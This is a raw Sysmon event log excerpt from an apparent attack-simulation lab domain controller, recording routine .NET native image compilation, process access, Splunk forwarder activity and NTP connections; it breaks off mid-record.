21:05:15.953{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A20B-60D3-5A04-00000000CF01}2080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021432Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:15.937{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A20B-60D3-5A04-00000000CF01}2080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021431Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:15.937{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A20B-60D3-5A04-00000000CF01}2080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021430Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:15.468{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A20B-60D3-5904-00000000CF01}3836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021429Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:15.453{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A20B-60D3-5904-00000000CF01}3836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021428Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:15.453{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A20B-60D3-5904-00000000CF01}3836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021427Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:15.281{4DB9351A-A208-60D3-5804-00000000CF01}5608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\15e8-0\System.Activities.dll2021-06-23 21:05:15.281 354300x800000000000000021426Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:14.117{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61436-false10.0.1.12-8000- 23542300x800000000000000021425Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:15.046{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7213C4F799BC9D4AC6C0B2944A2A021,SHA256=3489E3E203A8DFD04B5E5CEC0DF927EC4CBABE516FC58D389EA324AE7922630E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021436Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:16.468{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EFACF56D6C08FF04EE6B085C33D04288,SHA256=4A029F8B1DE7D40C0F0D7975E1345EACD598E78C4CC3161C90B36449921726D1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000021435Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:14.476{4DB9351A-9DDD-60D3-1100-00000000CF01}436C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-663.attackrange.local123ntpfalse168.61.215.74-123ntp 23542300x800000000000000021434Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:16.046{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2D333038D66693EC651E28CA86FA6EC,SHA256=1704A36780E274F613ED4311370A6C67BD1A3776AFFF934622E59AB00202712B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021451Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:17.937{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A20D-60D3-5E04-00000000CF01}3332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021450Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:17.921{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A20D-60D3-5E04-00000000CF01}3332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021449Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:17.921{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A20D-60D3-5E04-00000000CF01}3332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021448Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:17.796{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A20D-60D3-5D04-00000000CF01}7148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021447Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:17.765{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A20D-60D3-5D04-00000000CF01}7148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021446Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:17.765{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A20D-60D3-5D04-00000000CF01}7148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021445Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:17.703{4DB9351A-A20D-60D3-5C04-00000000CF01}6644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\19f4-0\System.Activities.DurableInstancing.dll2021-06-23 21:05:17.703 10341000x800000000000000021444Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:17.390{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A20D-60D3-5C04-00000000CF01}6644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021443Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:17.374{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A20D-60D3-5C04-00000000CF01}6644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021442Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:17.374{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A20D-60D3-5C04-00000000CF01}6644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021441Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:17.218{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A20D-60D3-5B04-00000000CF01}6120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021440Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:17.203{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A20D-60D3-5B04-00000000CF01}6120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021439Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:17.203{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A20D-60D3-5B04-00000000CF01}6120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021438Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:17.093{4DB9351A-A20B-60D3-5A04-00000000CF01}2080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\820-0\System.Activities.Core.Presentation.dll2021-06-23 21:05:17.093 23542300x800000000000000021437Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:17.062{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05B4B082A33107EDE66202AE9DFBB097,SHA256=C26F3FA964E6407E1323AD09C16C6A8FA942DDCA5540AD7F4E7EC2881D15D77A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021453Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:18.234{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FCA0D4B5F83FF9FA0674424BFE4E094E,SHA256=198BEDDA2AAE52C9CD98633F6E9DDAFBDDA200A0876D5C6CC716ACB2998CEFD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021452Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:18.078{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=680D81798FA77E861C45DF99CDA7E34F,SHA256=C358C800BF4F99C5EC4DE80C3383DA39F0BC628786CE9984B1AB5382E9C49557,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021454Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:19.109{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB4C3DBFF169D48DF93BDD4E58E52A08,SHA256=4711EC3FE2E34E29FED2D20F7AFE77477E209FE7C7E33C0A4D0B74414E387CAF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021459Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 